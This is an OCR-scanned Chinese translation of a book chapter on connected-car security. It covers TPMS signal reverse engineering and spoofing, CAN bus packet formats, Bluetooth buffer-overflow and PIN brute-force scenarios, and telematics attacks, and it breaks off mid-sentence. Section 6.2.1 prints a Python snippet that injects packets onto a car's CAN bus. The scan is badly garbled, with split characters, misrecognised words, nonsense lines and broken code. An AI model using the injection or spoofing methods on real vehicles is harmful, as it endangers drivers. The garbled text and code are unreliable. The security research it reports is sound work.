市 民 都 担心 感染 该 病毒 ， 虽 然 人 们 更 有 可 能 死 于 睡衣 着 火 而 不 是 感染 埃 博 拉 病 毒 。 撤 开 睡 衣 暂 且 不 谈 ， 我 们 的 确 常 低估 或 高 估 那 些 致命 事件 。 癌 症 和 心脏 病 是 已 知 致死 的 首要 
因素 ， 而 我 们 却 常 关 注 那些 不 太 可 能 的 情况 ， 如 死 于 飞机 失事 。 数 据 表明 : 乘客 死 于 飞机 失事 的 概率 为 一 干 一 百 万 分 之 一 。 死 于 汽车 交通 事故 的 概率 却 是 五 干 分 之 一 ， 而 大 多 
数 人 每 天 上 车 时 也 并 未 多 想 。 


车 祸 可 能 是 驾驶 时 注意 力 不 集 中 ， 超 速 ， 酒 后 驾车 ， 恶 劣 的 天 气 ， 阁 红 灯 ， 汽 车 缺陷 ， 不 安全 的 变 道 ， 转 弯 不 当 ， 跟 车 太 近 ， 开 车 斗气 ， 路 况 差 ， 爆 胎 ， 雾 ， 或 通过 动物 
通道 等 造成 的 。 大 多 数 读 者 都 亲身 经 历 过 或 大 或 小 的 交通 事故 ， 或 是 身边 认识 的 人 经 历 过 。 


尽管 汽车 与 驾驶 带 来 了 风险 ， 但 人 们 拥有 个 人 交通 工具 却 为 社会 带 来 了 巨大 的 效益 。 生 活 在 缺乏 公共 交通 基础 设施 的 城镇 中 的 人 依赖 有 辆 车 上 下 班 和 外 出 办 事 。 从 2010 年 
发 生 在 中 国 的 12 天 交通 堵塞 ， 到 休斯敦 人 为 了 躲避 即将 到 来 的 由 风 而 造成 的 250 万 辆 车 48 小 时 的 大 堵塞 ， 这 些 证 据 清晰 地 表明 世界 上 许多 城市 运转 将 陷入 停滞 ， 所 以 应 当 限 制 
个 人 交通 设施 。 


环境 污染 问题 对 气候 的 负面 影响 是 毋庸 置疑 的 ， 这 致使 公众 提高 并 加 强 了 对 混合 动力 汽车 重要 性 的 认识 ， 比 如 丰田 的 普锐斯 和 纯 电动 汽车 特 斯 拉 S 型 。 拥 有 一 辆 汽车 对 一 
些 人 来 说 可 能 是 奢侈 品 ， 对 另 一 些 人 来 说 事 关 生计 ， 但 它 关 系 到 人 类 关心 的 气候 问题 。 


过 去 几 年 ， 汽 车 互联 开始 广泛 地 服务 于 司机 和 乘客 。 依 赖 无 线 通 信 的 安全 和 娱乐 相关 特性 设置 越 来 越 流 行 ， 并 成 为 购买 新 车 的 买 家 所 期 待 的 。 汽 车 制造 商 也 不 断 努 力 减少 
尾气 排放 量 以 符合 法 规 ， 并 安抚 真正 关心 环境 的 (和 那些 想 要 省 油 钱 的 ) 客户 。 


本 章 ， 我 们 将 看 一 看 远程 访问 和 远程 控制 汽车 意味 着 什么 。 不 同 于 其 他 设备 ， 汽 车 互联 能 提供 重要 的 安全 功能 一 一 与 此 同时 ， 安 全 漏洞 会 致 人 死亡 。 我 们 在 分 析 联网 汽车 
的 过 程 中 ， 首 先 考 察 一 个 低频 的 无 线 系统 ， 然 后 评述 一 下 学 术 界 的 权威 专家 对 此 开展 的 广泛 研究 。 最 后 ， 我 们 将 分 析 探 讨 在 特 斯 拉 S 型 轿车 上 能 找到 的 相关 功能 ， 也 包括 探讨 
提高 汽车 安全 性 的 可 能 途径 。 


6.1. 轮胎 压力 监测 系统 


福特 探险 者 (Ford Explorer) 汽车 在 1990 年 3 月 首次 发 售 。 据 称 ， 福 特 的 工程 师 在 大 规模 投产 前 建议 修改 汽车 的 设计 ， 因 为 它 曾 在 测试 中 翻车 。 这 些 车 都 装 有 费 尔 斯 通 
(Firestone) 生产 的 轮胎 。 装 备 了 费 尔 斯 通 轮胎 的 福特 探险 者 汽车 最 终 导 致 了 涉及 174 人 死亡 和 超过 700 人 受伤 的 多 起 事故 。 对 此 ， 费 尔 斯 通 召 回 了 轮胎 。 结 果 成 了 一 个 指责 
游戏 : 福特 被 指控 出 售 有 已 知 的 安全 隐患 的 汽车 ， 而 福特 则 指控 费 尔 斯 通 生产 有 缺陷 的 轮胎 (缺陷 包括 “ 胎 面 分 离 ”， 会 导致 轮胎 解体 ,汽车 稳定 性 下 降 ) 。 


这 场 争论 导致 联邦 法 律 在 2000 年 制定 了 强化 交通 工具 召回 责任 和 文件 法 案 (TREAD) 。 该 法 案 规定 使 用 合适 的 轮胎 压力 监测 系统 (TPMS) 监测 轮胎 中 的 空气 压力 ， 并 在 
有 任何 情况 时 向 驾驶 员 报 告 ， 比 如 轮胎 压力 过 低 。 


福特 / 费 尔 斯 通 事件 导致 近 两 百人 死亡 。 由 此 ， 我 们 很 容易 推断 出 不 适当 的 轮胎 压力 会 导致 每 天 大 量 的 死亡 事件 发 生 。 所 以 很 明显 ， 设 计 良 好 的 轮胎 压力 监测 系统 非常 重 
要 。 该 系统 应 当 能 向 驾驶 员 报告 轮胎 压力 过 低 的 情况 ， 并 且 不 容易 受 其 他 因素 影响 ， 如 系统 显示 轮胎 压力 过 低 的 警告 ， 而 实际 轮胎 压力 却 在 正常 范围 内 。 否 则 ， 高 速 公路 上 的 
强盗 在 汽车 附近 的 范围 内 能 通过 激活 胎 压 过 低 报警 而 让 驾驶 员 在 荒 郊野 外 停车 。 来 自 南 卡罗来纳 大 学 的 研究 人 员 通 过 深入 分 析 TPMS， 发 现存 在 可 以 利用 的 安全 设计 缺陷 。 在 
本 节 中 ， 我 们 将 看 看 他 们 的 研究 ， 了 解 这 些 系统 并 发 现 问题 。 由 于 TPMS 依 赖 于 非常 基本 的 无 线 通信 机 制 ， 这 是 我 们 研究 联网 汽车 安全 性 的 首要 切入 点 。 


TPMS 测 量 车 辆 上 所 有 的 轮胎 的 压力 ， 并 在 轮胎 失 压 时 警示 驾驶 员 。 现 有 两 种 不 同类 型 的 TPMS: 直接 和 间接 测量 系统 。 直 接 测量 系统 在 每 个 轮胎 中 使 用 由 电池 供电 的 压 
力 传感器 监测 压力 。 由 于 在 旋转 的 轮胎 周围 布线 非常 困难 ， 所 以 用 射频 (RF) 传输 代 蔡 有 线 传输 。 传 感 器 通过 RF 通 信 并 向 轮胎 压力 接收 控制 单元 传输 数据 ， 控 制 单元 从 所 有 
的 轮胎 传感器 收集 信息 。 当 有 传感器 报告 轮胎 气压 低 时 ， 控 制 单 元 通过 控制 器 局 域 网 (CAN) 传输 消息 ， 在 汽车 仪表 盘 上 发 出 警告 信息 。 另 一 方面 ， 间 接 测量 系统 通过 防 抱 死 
制 动 系统 (ABS) 传感器 推断 压力 差异 。 当 一 个 轮胎 失 压 时 ，ABS 能 帮助 探测 到 一 个 轮胎 转动 得 比 其 他 轮胎 快 。 然 而 ， 这 种 方法 是 不 准确 的 ， 也 不 能 判断 所 有 轮胎 失 压 的 情 
况 。 截 止 到 2008 年 ， 在 美国 的 所 有 新 车 都 必须 采用 直接 式 TPMS。 


汽车 里 布 满 了 使 用 CAN 规 范 通信 的 电子 控制 单元 (ECU) 。ECU 是 微型 计算 机 ， 控 制 着 汽车 的 方方面面 。 所 有 的 ECU 通 过 沿 着 车 身 的 两 条 线 连 接 (CAN-High 和 CAN- 
Low) 。ECU 通 过 升 高 或 降低 线 上 的 电压 来 通信 。 因 为 所 有 的 ECU 都 连 到 同一 组 线 上 ， 网 络 上 的 其 他 ECU 都 可 以 收 到 一 个 ECU 的 传输 数据 。 利 用 CAN 标 准 进行 ECU 通 信 收 集 称 
为 CAN 总 线 。 


TPMS 由 一 系列 组 件 构 成 。 安 装 到 轮胎 上 的 TPMS 传 感 器 周期 性 地 广播 轮胎 压力 和 温度 测量 值 。 传 感 器 在 车 速 超过 40 干 米 /小 时 被 激活 ， 或 由 一 个 收 到 的 RF 激活 信号 激活 ， 
这 个 RF 激 活 信号 在 安装 期 间 用 于 连接 传感器 来 传送 ID。RF 接 收 单元 作为 TPM SS 系统 的 一 部 分 记录 了 本 车 传感器 的 ID 信息 ， 从 而 能 够 过 滤 掉 来 自 附近 汽车 的 传感器 信息 。 同 样 ， 
车 里 安装 了 TPMS ECU， 包 括 了 一 个 或 四 个 单独 的 天 线 用 来 从 传感器 向 RF 接 收 单元 传输 数据 。 低 压 报警 灯 也 是 TPMS 的 一 部 分 。 传 感 器 定期 广播 压力 和 温度 测量 信息 ， 接 收 单 
元 接收 数据 包 并 验证 其 〈 基 于 ID) 属于 该 车 。 如 果 任 何 一 个 传感器 发 送 读数 指明 轮胎 压力 过 低 时 ， 系 统 报警 灯 就 会 显示 。 


6.1.1. 逆向 TPMS 通 信 


来 自 南 卡罗来纳 大 学 的 研究 人 员 试图 分 析 传感器 和 接收 单元 之 间 使 用 的 专 有 协议 。 在 本 节 ， 我 们 会 看 到 他 们 的 方法 和 分 析 是 独一无二 的 ， 因 为 他 们 操纵 传感器 周围 的 温度 
进行 协议 的 逆向 工程 。 这 种 思维 方式 是 至 关 重要 的 ， 因 为 它 说 明了 部 分 安全 研究 人 员 的 创造 性 。 犯 罪 分 子 也 可 以 用 这 种 方法 对 通信 进行 逆向 工程 ， 所 以 安全 的 通信 协议 和 支撑 
架构 设计 是 非常 重要 的 。 


基于 收集 的 市 面 上 的 资料 ， 研 究 者 发 现 ，TPMS 通 信 工 作 在 超 高 频 (UHF) 范围 一 一 具体 来 说 在 315MHz 和 433M Hz 频段 ， 采 用 幅 移 键 控 (ASK) 、 频 移 键 控 (FSK) 调 
制 。 调 制 方式 基本 上 是 任何 给 定 介质 的 交互 通信 方式 ， 如 穿 过 空气 或 导线 。 就 拿 使 用 无 线 电 来 传输 声音 为 例 ， 把 语音 转换 成 无 线 电 信号 便于 无 线 发 送 ， 这 一 过 程 称 之 为 调制 。 
载波 频率 (通常 称 为 载波 ) 是 调制 传输 无 线 通信 的 波形 。 在 ASK 的 情况 下 ， 当 传输 二 进 制 字符 1 的 时 候 载波 信号 变 为 一 个 固定 值 ;传输 二 进 制 符号 0 的 时 候 载波 信号 被 关闭 。 在 
FSK 的 情况 下 ， 载 波 信号 变 为 一 个 固定 值 代表 1 或 0。 有 许多 在 线 教 程 更 详尽 地 讨论 了 这 一 调制 。 


研究 人 员 没 有 透露 所 关注 的 两 种 不 同类 型 的 传感器 的 生产 厂家 ， 而 用 压力 传感器 A (TPS-A) 和 压力 传感器 B (TPS-B) 来 代替 。 使 用 ATEQ VT55TPMS 触 发 工具 (如 图 6- 
1 所 示 ) 来 触发 传感器 传输 数据 。 


图 6-1: ATEQ VT55TPMS 和 触发 工具 


研究 小 组 通过 安装 在 通用 软件 无 线 电 外 设 (USRP) 上 的 TVRX 子 板 (如 图 6-2 所 示 ) 捕获 TPMS 的 通讯 信息 。 软 件 定义 无 线 电 的 好 处 是 : 只 要 有 可 能 用 软件 来 实现 就 不 使 
用 硬件 ， 这 一 特性 使 分 析 无 线 电 通讯 变 得 更 加 经 济 。 


RE 
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图 6-2: TVRX 子 板 
用 GNU Radio 分 析 来 自 USRP 的 数据 ， 它 是 一 个 开源 软件 开发 套件 ， 用 来 处 理 捕获 的 信号 。 


该 研究 小 组 分 析 了 传感器 传输 的 数据 ， 他 们 猜测 : 其 中 使 用 了 被 称 为 曼彻斯特 编码 的 技术 。 他 们 通过 算法 来 解码 曼彻斯特 编码 的 数据 ， 生 成 了 含有 已 知 传感器 ID 的 信息 
流 ， 从 而 验证 了 这 一 点 。 这 是 一 项 对 一 个 给 定 的 体系 结构 进行 逆向 工程 的 重要 技术 : 寻找 数据 中 的 已 知 元 组 (本 例 中 是 传感器 ID) ， 从 而 验证 是 否 使 用 了 正确 的 解码 算法 。 虽 
然 曼彻斯特 编码 不 是 一 种 加 密 算法 ， 但 寻找 一 个 已 知 元 组 以 查看 是 否 分 析 正 确 的 技术 类 似 于 密码 学 领域 的 已 知 明文 攻击 ， 即 攻击 者 有 密 文 和 对 应 明文 的 复制 ， 可 以 用 这 一 信息 
来 推断 嵌入 算法 的 弱点 或 秘密 。 


接 下 来 ， 研 究 小 组 通过 利用 热 枪 加 热 轮 胎 ， 并 用 冰箱 降温 来 操作 传感器 。 然 后 ， 他 们 查看 通信 中 哪些 位 发 生 了 变化 。 他 们 还 调整 了 轮胎 气压 。 这 是 另 一 个 要 记 住 的 处 理 物 
联网 设备 的 独特 和 关键 的 方面 : 用 软件 影响 物理 对 象 周围 的 环境 的 想法 是 不 适用 的 ， 但 用 它 包含 的 传感器 收集 的 物理 世界 的 信息 肯定 是 在 物 联网 设备 的 测试 方法 范围 内 。 使 用 
这 种 技术 ， 研 究 人 员 能 够 解码 传感器 的 通信 流 ， 以 确定 哪些 位 数据 是 温度 数据 。 


6.1.2 ”窃听 和 隐私 问题 


轮胎 传感器 传输 的 数据 是 不 加 密 的 ， 附 近 其 他 配备 有 TPMS 的 汽车 可 以 捕获 信息 。 研 究 人 员 发 现 ， 他 们 能 够 窃听 40 米 内 静止 的 目标 车 的 传感器 数据 。 


从 隐私 的 角度 来 看 ， 风 险 是 在 路 边 部 署 的 跟踪 系统 可 用 于 在 城市 周围 跟踪 特定 的 车 辆 ， 根 据 传感器 的 ID 确定 司机 的 位 置 。 这 样 做 的 可 行 性 很 低 ， 因 为 传感器 每 60 秒 传输 一 
次 数据 。 然 而 ， 研 究 人 员 提 出 ， 跟 踪 系统 可 能 实际 上 利用 传感器 的 激活 响应 信号 (工作 在 125 干 赫 ) 。 这 意味 着 一 个 可 植 入 装置 可 以 发 出 激活 信号 触发 传感器 传输 。 基 于 该 区 
域 的 平均 限 速 ， 无 线 捕获 装置 可 以 通过 放置 在 适当 的 距离 捕获 由 传感器 发 送 的 数据 。 采 用 这 种 方式 ， 人 们 可 以 廉价 地 部 署 一 个 用 于 在 设 定 城市 跟踪 汽车 位 置 的 系统 。 


这 个 例子 的 严重 性 在 于 : 数 以 百 万 计 装 有 TPMS 的 汽车 传输 的 传感器 数据 会 被 附近 的 人 或 设备 捕获 ， 并 且 大 多 数 有 TPMS 功 能 的 汽车 车 主 不 知道 自己 的 车 传输 这 些 信息 。 


此 外 ， 即 使 一 般 车 主 想 要 关 掉 该 系统 也 并 不 容易 (大 多 数 人 会 让 系统 一 直 开 着 ， 因 为 相 比 跟踪 ， 他 们 更 关心 的 是 胎 压 过 低 带 来 的 危险 ) 。 


该 研究 有 趣 的 地 方 是 ， 它 促使 我 们 停 下 来 反思 我 们 将 来 如 何 设计 互联 设备 。 这 里 的 教训 是 : 在 空气 中 传播 的 潜在 可 跟踪 的 数据 会 危及 消费 者 的 隐私 ， 特 别 是 在 这 种 情况 
下 ， 该 平台 上 数 以 百 万 计 的 设备 的 寿命 长 达 数 十 年 。 此 外 ， 设 备 制造 商 必须 更 好 工作 ， 告 知客 户 什 么 样 的 信息 会 被 传输 ， 以 及 这 些 信息 对 客户 的 隐私 可 能 造成 的 影响 。 


6.1.3 ”虚假 警报 


ng 


卡罗来纳 大 学 的 研究 人 员 设 想 的 另 一 种 场景 是 : 一 个 攻击 者 可 能 会 恶搞 无 线 网 络 数据 引发 受害 者 的 汽车 发 出 警报 。 研 究 人 员 发 现 他 们 可 以 精 I5 伪 造 汽车 左前 轮 传输 的 网 
络 数据 包 触 发 汽车 右 侧 的 报警 。 这 里 要 说 明 的 是 : 这 种 方法 中 攻击 者 必须 知道 受害 人 的 一 个 汽车 轮胎 传感器 ID。 但 是 这 很 容易 实现 ， 只 要 发 送 一 个 激活 信号 即 可 。 伪 造 的 数据 
包 能 被 38 米 外 的 受害 者 的 汽车 接收 ， 并 触发 汽车 轮胎 低压 报警 灯 。 


在 分 析 过 程 中 ， 研 究 人 员 试图 发 送 多 达 每 秒 40 个 具有 欺骗 性 的 数据 包 ， 但 发 现 即使 传感器 包 的 预期 频率 为 每 60 秒 一 次 ， 接 收 单元 和 TPMS ECU 并 没有 怀疑 。 研 究 人 员 还 
发 现 ， 当 含有 不 同 压 力 数据 的 伪造 数据 包 以 每 秒 40 个 的 速率 传输 时 ， 报 警 灯会 在 “随机 ”的 时 间 间 隔 中 点 亮 或 熄灭 。 


在 测试 过 程 中 ， 还 发 现 另 一 件 怪事 : 事实 上 当 伪 造 的 数据 包 传输 时 ， 受 害 者 汽车 的 TPMS ECU 并 不 立即 发 出 报警 信号 ， 而 是 发 出 两 个 激活 信号 引起 受害 者 的 汽车 的 传感器 
响应 。 但 是 ， 即 便 这 一 响应 来 自 含 有 正常 读数 的 合法 传感器 ，ECU 仍 然 优 先 于 两 个 激活 信号 而 基于 原来 伪造 的 数据 包 闪 烁 报警 灯 。 最 终 ， 攻 击 不 仅 成 功 ， 受 害 者 的 汽车 也 受到 
电池 耗 尽 的 攻击 : 邻近 汽车 可 以 通过 反复 发 送 伪造 的 数据 包 引 起 受害 人 的 汽车 传输 两 个 激活 数据 包 ， 导 致 汽车 的 每 个 传感器 轮流 发 送 响应 包 ， 从 而 消耗 受害 者 的 汽车 传感器 电 
池 。 


经 过 两 个 星期 的 实验 ， 研 究 人 员 无 意 中 造 成 了 测试 汽车 TPMS ECU 的 骨 溃 ，TPMS 服 务 完 全 次 病 。 他 们 无 法 修复 该 单元 ， 最 终 不 得 不 在 汽车 经 销 店 那 买 了 一 个 新 的 ECU。 
这 说 明 ECU 厂 商 没 有 在 应 对 突 发 事件 和 恶意 欺骗 包 上 投入 足够 时 间 。 


这 又 是 一 个 很 好 的 例证 ， 在 设计 的 早期 阶段 就 需要 设计 产品 的 安全 性 。 软 件 方面 ， 我 们 在 用 例 设 计 、 架 构 设计 、 开 发 、 测 试 和 后 期 制作 过 程 中 需要 使 用 安全 原则 。 在 测试 
ECU 单 元 的 例子 中 ， 显 然 制 造 商 在 产品 开发 阶段 并 没有 完全 考虑 安全 问题 。 


当 我 们 继续 走向 一 个 充满 互联 汽车 的 世界 时 ， 我 们 应 当 在 实现 安全 和 隐私 相关 控制 上 投 上 更 多 精力 。 不 这 样 要 求 ， 我 们 的 个 人 隐私 和 安全 仍 将 置 于 危险 之 中 。 


6.2 ”利用 无 线 连 接 


到 目前 为 止 ， 我 们 了 解 到 互联 汽车 依赖 CAN 总 线 上 的 ECU 通 信 ， 也 了 解 了 TPMS ECU 的 设计 ， 但 还 有 其 他 许多 对 于 汽车 的 安全 功能 常见 并 至 关 重要 的 ECU。 研 究 人 员 
Charlie Miller 和 Chris Valasek 在 “远程 自动 攻击 概述 ”和 “汽车 网 络 和 控制 单元 探秘 ”的 文章 中 介绍 了 许多 ECU 的 功能 。 尽 管 一 些 报道 使 得 他 们 的 研究 成 果 被 忽视 ， 因 为 他 
们 的 演示 基于 假定 可 进入 汽车 的 情况 ， 但 他 们 对 各 种 ECU 和 CAN 总 线 系统 的 分 析 非 常 有 用 。 此 外 ， 加 利 福 尼 亚 大 学 、 圣 地 亚 哥 和 华盛顿 大 学 的 研究 人 员 已 经 表明 : 利用 短程 和 
长 距离 的 无 线 网 络 远程 访问 汽车 是 可 行 的 。 这 项 研究 ， 再 加 上 Miller 和 Valasek 的 分 析 ， 让 我 们 想象 这 样 的 场景 : 犯罪 分 子 可 能 利用 汽车 的 无 线 网 络 和 ECU 的 工作 原理 远程 破 
坏 和 控制 目标 车 辆 。 本 节 ， 我 们 将 结合 两 个 研究 小 组 提出 的 想法 ， 进 一 步 了 解 以 汽车 中 的 蓝牙 和 蜂窝 网 络 为 目标 的 攻击 。 


6.2.1 注入 CAN 总 线 数 据 


Miller 和 Valasek 在 解释 CAN 总 线 数据 结构 方面 所 做 的 工作 非常 出 色 。 至 关 重要 的 是 ， 了 解 了 CAN 数 据 包 的 结构 ， 使 我 们 对 这 些 数据 包 是 如 何 被 ECU 生 成 和 计算 的 有 了 清 


这 是 福特 翼 虎 的 一 个 数据 包 示 例 : 


IDH: 03, IDL: Bl, Len: 08, Data: 80 00 00 00 00 00 00 00 


在 这 个 数据 包 中 ，CAN 的 ID 是 03B1 (1D 高 位 和 ID 底 位 的 连接 ) 。 每 个 ECU 收 到 CAN 的 数据 包 后 ， 决 定 是 处 理 还 是 忽略 它 取决 于 对 识别 CAN ID 数据 包 是 如 何 编程 的 。 下 
一 个 字 节 代表 了 包 的 数据 部 分 的 大 小 ， 这 里 是 8 个 字 节 。 


这 是 丰田 Prius 的 CAN 数 据 包 的 示例 : 


IDH: 00, IDL: B6, Len: 04, Data: 33 A8 00 95 


在 Prius 的 例子 中 ， 发 现 最 后 一 个 字 节 是 下 面 算法 计算 出 的 校 输 和 : 


Checksum = (IDH + IDL + Len + Sum(Data[0] - Data[Len-2])) & OxFF 


简单 起 见 ， 这 里 给 出 数据 包 的 十 进 制 值 : 


OxA8 = 


168 


全 加 起 来 ， 是 182+4+51+168=405， 二 进 制 表 示 为 : 


0000 0 


001 1001 0101 


0xFF 是 十 进 制 的 255， 下 面 是 二 进 制 的 值 : 


0000 0 


000 1111 1111 


把 两 个 值 进行 “与 ”操作 时 得 到 如 下 二 进 制 结果 : 


0000 0 


000 1001 0101 


这 一 结果 的 十 进 制 是 149， 十 六 进 制 表示 为 0x95。 这 正好 是 我 们 例子 中 数据 包 的 最 后 一 个 字 节 的 值 ， 因 此 我 们 验证 了 对 丰田 的 校 输 和 解释 。 


Miller 和 Valasek 使 用 ECOM 电 费 捕 捉 到 CAN 总 线 流 量 ， 并 在 他 们 的 笔记 本 电脑 进行 分 析 。 该 电费 不 能 直接 使 用 大 多 数 汽 车 中 的 OBD2 接 口 连 接 ， 因 此 研究 人 员 购 买 了 
OBD2 适 配器 进行 匹配 。 这 种 设置 的 优点 是 能 获得 开发 者 API、 用 于 编程 和 自动 化 捕获 ， 以 及 CAN 数 据 注入 。 研 究 者 使 用 这 个 API 函 数 编写 自己 的 工具 套件 ， 辅 助 CAN 数 据 包 
进行 安全 性 评估 测试 。 这 个 项 目 叫做 ecomcat_api， 你 可 以 免费 下 载 到 。 


使 用 ecomcat_api 项 目的 第 一 个 商业 订单 是 建立 与 汽车 CAN 总 线 的 连接 ， 导 入 必要 的 模块 ， 并 设置 代表 CAN 总 线 数 据 包 中 的 字段 : 


from c 


types import * 

import time 

mydll = CDLL('DebugWNWecomcat api') 

class SFFMessage (Structure) Do 

fields = [("IDH", c ubyte), 

m B "IDL", c ubyte), 
"data", c ubyte * 8), 
"options", c ubyte), 
"DataLength", c ubyte), 
"TimeStamp", c uint), 
"baud", c ubyte)] 


接 下 来 ， 初 始 化 连接 到 ECOM 电线: 


handle 


= mydll.open device (1,0) 


根据 研究 ，1 表 示 高 速 CAN 网 络 ，0 代 表 第 一 个 正在 连接 的 电缆 处 于 使 用 中 。 


现在 很 有 可 能 将 CAN 数 据 包 注入 CAN 总 线 : 


y= po 


5D 
mydll. 
mydll. 
mydll. 


inter (SFFMessage ()) 
mydll.DbgLineToSFF("IDH: 02, IDL: 30, Len: 08, Data: A1 00 00 00 00 00 
30", y) 
PrintSFF(y, 0) 
write message cont (handle, y, 1000) 
close device (handle) 


这 将 连续 发 送 数据 包 1000 毫 秒 。 


发 送 CAN 数 据 包 到 CAN 总 线 网 络 是 多 么 容易 啊 。 关 于 如 何 使 用 这 个 工具 来 测试 和 注入 各 类 CAN 数 据 包 的 更 多 细节 ， 请 阅读 关于 它 的 白皮书 。 


WE, 


我 们 了 解 了 注入 CAN 数 据 包 非 常 容 易 ， 我 们 来 看 一 下 远程 获取 访问 CAN 的 权限 的 可 能 方式 。 正 如 本 节 我 们 看 到 的 ， 一 旦 访问 到 CAN ， 就 很 容易 实施 数据 注入 。 这 


给 了 我 们 一 个 很 好 的 视角 进行 观察 ， 一 旦 攻击 者 入 侵 了 CAN 总 线 上 的 ECU， 会 存在 高 潜在 的 滥用 威胁 。 


6.2.2 ”蓝牙 漏洞 


Miller 和 Valasek 的 远程 自动 攻击 面 分析 声 明 : “现在 ， 这 篇 文章 的 作者 认为 : 由 于 协议 和 基础 数据 的 复杂 性 ， 蓝 牙 是 现代 汽车 最 大 和 最 有 活力 的 攻击 面 。 另 外 ， 蓝 牙 已 
成 为 无 处 不 在 的 汽车 频谱 ， 给 攻击 者 一 个 非常 可 靠 的 切入 点 来 测试 。” 


20108 


FMillerfüValaselot ES ESSrRBS A trig m: 由 附件 协议 接口 模块 (APIM) 提供 的 蓝牙 功能 也 被 认为 是 福特 同步 计算 机 。 研 究 人 员 发 现 ， 必 须 明确 地 按 下 汽车 上 的 一 


个 键 将 其 变 为 配对 模式 ， 使 其 连接 和 信任 一 部 特定 的 智能 手机 。 汽 车 显示 一 个 6 位 密码 ， 必 须 将 它 输 入 智能 手机 进行 配对 。 然 而 ， 由 加 利 福 尼 亚 大 学 圣迭戈 分 校 和 华盛顿 大 学 
组 成 的 研究 小 组 已 经 确定 利用 蓝牙 技术 进行 直接 和 间接 的 无 线 网 络 攻击 的 场景 。 


这 些 研究 人 员 对 他 们 用 于 实验 汽车 上 的 蓝牙 固件 进行 逆向 工程 之 后 ， 发 现 各 种 缓冲 区 溢出 攻击 漏洞 (他们 的 文章 中 没有 提 到 使 用 的 模型 或 制造 商 ) 。 缓 冲 区 溢出 攻击 能 
于 挫 毁 受害 者 的 计算 机 内 存 ， 用 代码 注入 重 写 相 邻 的 存储 单元 。 这 可 以 让 攻击 者 远程 获得 计算 机 的 完全 控制 权 。 研 究 人 员 没 有 透露 他 们 利用 的 确切 代码 ， 但 是 他 们 表示 ,他们 


能 够 滥用 不 当 的 strcpy 遂 数 执行 ， 这 是 一 个 非常 常见 导致 缓冲 区 溢出 攻击 的 途径 。 


在 利用 缓冲 区 溢出 条 件 之 前 ， 攻 击 者 首先 要 用 恶意 智能 手机 与 使 用 蓝牙 的 汽车 进行 配对 。 研 究 人 员 和 解释 说 ， 这 可 以 用 两 种 方式 : 间接 方式 和 直接 方式 。 间 接 选 项 需要 攻击 
者 获得 汽车 车 主 拥有 的 手机 的 临时 物理 访问 权限 ， 并 且 这 个 手机 已 经 和 蓝牙 系统 配对 ， 或 者 更 有 可 能 的 是 诱 使 车 主 下 载 一 个 已 经 感染 的 应 用 程序 。 已 经 有 很 多 这 样 的 案例 ， 恶 


意 应 用 程序 已 经 悄悄 溜 过 著名 的 应 用 程序 商店 平台 的 审查 ,例如 Google Play Store (Android Market 的 原 身 ) ， 所 以 我 们 有 证 据 表明 攻击 者 的 应 用 程序 可 供用 户 设备 下 载 。 
研究 人 员 声称 ， 司 机 用 已 经 与 蓝牙 系统 配对 的 智能 手机 ， 被 引诱 下 载 并 运行 恶意 应 用 程序 ， 缓 冲 区 溢出 条 件 就 可 以 被 用 来 接管 ECU 负 责 处 理 蓝牙 功能 。 


在 直接 攻击 的 情况 下 (不 用 接 入 已 经 配对 的 设备 ) ， 研 究 者 描绘 了 一 个 场景 ， 在 场景 中 ， 汽 车 附近 的 攻击 者 能 够 “ 嗅 探 ” 到 汽车 蓝牙 的 物理 地 址 ， 并 暗中 与 汽车 的 一 个 新 
装置 配对 。 为 了 配对 一 个 新 设备 ， 用 户 通常 采用 开启 配对 模式 。 正 如 前 面 提 到 的 ， 司 机 这 么 做 的 时 候 ， 汽 车 显示 一 个 6 位 的 个 人 识别 密码 ， 用 户 必 须 输入 到 设备 。 然 而 ， 研 究 
者 发 现 当 配对 模式 没有 被 要 求 时 候 ， 他 们 所 分 析 的 汽车 仍然 与 新 设备 配对 。 然 而 汽车 并 没有 显示 个 人 识别 密码 ， 因 此 研究 者 提出 一 个 暴力 破解 的 情景 ， 攻 击 者 会 尝试 所 有 可 能 
的 组 合 (000000 ~ 999999) 。 研 究 者 声称 ， 他 们 平均 10 个 小 时 就 能 暴力 破解 出 个 人 识别 密码 。 一 旦 攻击 者 的 设备 成 功 配对 ， 攻 击 者 将 登录 设备 上 的 恶意 软件 ， 采 用 所 知道 的 
缓冲 区 溢出 来 控制 ECU。 研 究 人 员 承 认 ，10 小 时 时 间 很 长 ， 因 为 这 辆 车 在 持续 攻击 期 间 需 要 一 直 运行 着 。 然 而 ， 有 一 种 情况 他 们 能 在 一 刻 钟 内 就 能 猜 出 这 个 密码 ， 他 们 提出 了 
一 个 场景 ， 在 一 个 停车 场 内 ， 潜 在 的 攻击 者 可 以 同时 针对 多 辆 车 平行 运行 这 个 攻击 ， 增 加 成 功 几率 。 


6.2.3 “远程 信息 处 理 漏洞 


许多 汽车 包含 蜂窝 无 线 电 设备 ， 用 于 将 汽车 连接 到 蜂窝 网 络 。 一 个 流行 的 例子 是 通用 汽车 的 OnStar， 它 为 司机 和 乘客 提供 了 许多 功能 ,包括 紧急 情况 下 联系 呼叫 中 心 。 
作为 这 项 服务 的 一 部 分 ， 该 系统 可 以 跟踪 车 辆 位 置 ， 在 发 生 交通 事故 时 将 其 位 置 传递 到 呼叫 中 心 ， 以 便 援 助 信息 可 以 自动 发 送 。 该 系统 还 提供 如 被 盗 车 辆 跟踪 功能 ， 甚 至 允许 
呼叫 中 心 远程 让 被 盗 车 辆 降 速 。 负 责 处 理 这 个 蜂窝 通信 的 计算 机 称 为 远程 信息 处 理 控制 单元 。 


在 白皮书 中 ，Miller 和 Valasek 关 于 远程 信息 处 理 单元 声明 了 以 下 建议 : 


这 是 自动 攻击 的 制胜 法 宝 ， 它 的 应 用 范围 相当 广泛 (例如 ， 只 要 车 具有 蜂窝 通讯 模块 ) 。 尽 管 远程 信息 处 理 单元 可 能 不 直接 存储 在 CAN 和 总 线 ， 但 它 具 有 远程 传输 的 数据 / 
语音 的 能 力 ， 通 过 麦克 风 传 送 到 另 一 个 位 置 。 研 究 人 员 早 先 远程 利 用 汽车 的 远程 信息 处 理 单元 无 需 用 户 交 互 。 


成 功 攻击 对 远程 信息 处 理 系统 的 确 影响 很 大 ， 鉴 于 许多 远程 信息 处 理 系统 有 一 个 实际 的 手机 号 码 可 以 接收 传 入 的 连接 。 该 方案 允许 攻击 者 远程 问 入 世界 各 地 的 汽车 。 加 州 
